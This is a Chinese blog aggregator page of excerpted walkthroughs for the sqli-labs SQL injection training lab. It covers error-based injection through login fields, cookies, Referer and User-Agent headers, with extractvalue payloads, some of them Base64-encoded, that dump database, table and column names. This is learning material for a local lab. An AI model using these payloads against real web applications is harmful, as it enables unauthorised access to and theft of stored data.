首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
SQLI DUMB SERIES-12
】的更多相关文章
SQLI DUMB SERIES-17
(1)无论怎么输入username,都没有回显.尝试改变password的输入.找到了闭合方式:单引号 (2)报错注入: 爆库名 admin&passwd=admin' and extractvalue(1,concat(0x7e,(select database())))and '# 爆表名: uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from inf…
SQLI DUMB SERIES-14
(1)闭合方式为一对双引号 (2)可用报错注入.如: admin" and extractvalue(1,concat(0x7e,(select database()))) and " 其余报错注入方式于12关相同.…
SQLI DUMB SERIES-13
(1)检测闭合方式 通过 ') 闭合. (2)尝试输入 admin')# 无回显.尝试报错注入, 爆表payload: admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 爆表名 爆users表的列 其他均与12关相同.…
SQLI DUMB SERIES-11
(1)检测构造方式 由此看出输入的用户名以及密码都被一对单引号所包含. 方法一: (2) 模拟真实环境,以用户的身份登录. (3)用burp抓包.开启抓包,输入用户名和密码,会自动跳到这个页面,右键,点击send to repeater. (4)打开burp的repeater页面,修改post参数,测试是否存在报错注入. 说明存在报错型注入. (5)可用extractvalue(目标xml文档,搜索路径)进行攻击. 爆库名(库名前用‘~’进行区别) uname=admin' and extrac…
SQLI DUMB SERIES-1
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http: 结果: http: 结果: 现在可知,“ ' ”并没有被过滤,因此可以进行以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=1%23 结果:回显正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=2%23 结果:回显失败 由此可见,…
SQLI DUMB SERIES-22
(1)根据题目知道此处是双引号注入,其余的与上一关相同. 登录成功后,用burp抓包,再刷新浏览器页面.寻找闭合方式: 闭合方式果然为双引号. (2)其payload与21关相同,需要对payload进行based64编码,同时将闭合方式改变即可. 例如: admin1" and extractvalue(1,concat(0x7e,(select database())))# 编码: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2V…
SQLI DUMB SERIES-21
Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) (1)登录成功后有以下页面: 其中红圈内的字符为admin的BASED64编码后的字符. (2)用burp抓包,再刷新浏览器. 寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs= 闭合方式为' ) (3)开始报错注入,需要将payload用based63编码输入.例如:爆表名 admin') and extrac…
SQLI DUMB SERIES-20
(1)登录成功后页面: (2)登录成功后,用burp开始抓包,刷新浏览器页面,将会跳出如下页面 (3)根据各种提示,知道需要从cookies入手,寻找闭合方式 闭合方式为单引号.注释符也可以用 (4)开始注入:可用报错注入,方法同前面的一样,例如:爆库名 uname=admin1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#…
SQLI DUMB SERIES-19
(1)根据题意,从Referer入手 (2)报错注入与上一关相同.如爆库名: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '…
SQLI DUMB SERIES-18
(1)对username和password无论怎么输入,都没有回显,再看题目,POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)提示从user-agent入手,尝试 闭合方式为单引号. (2)有回显则可用报错型注入,例如爆库名.其余与前面的报错注入相同 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '…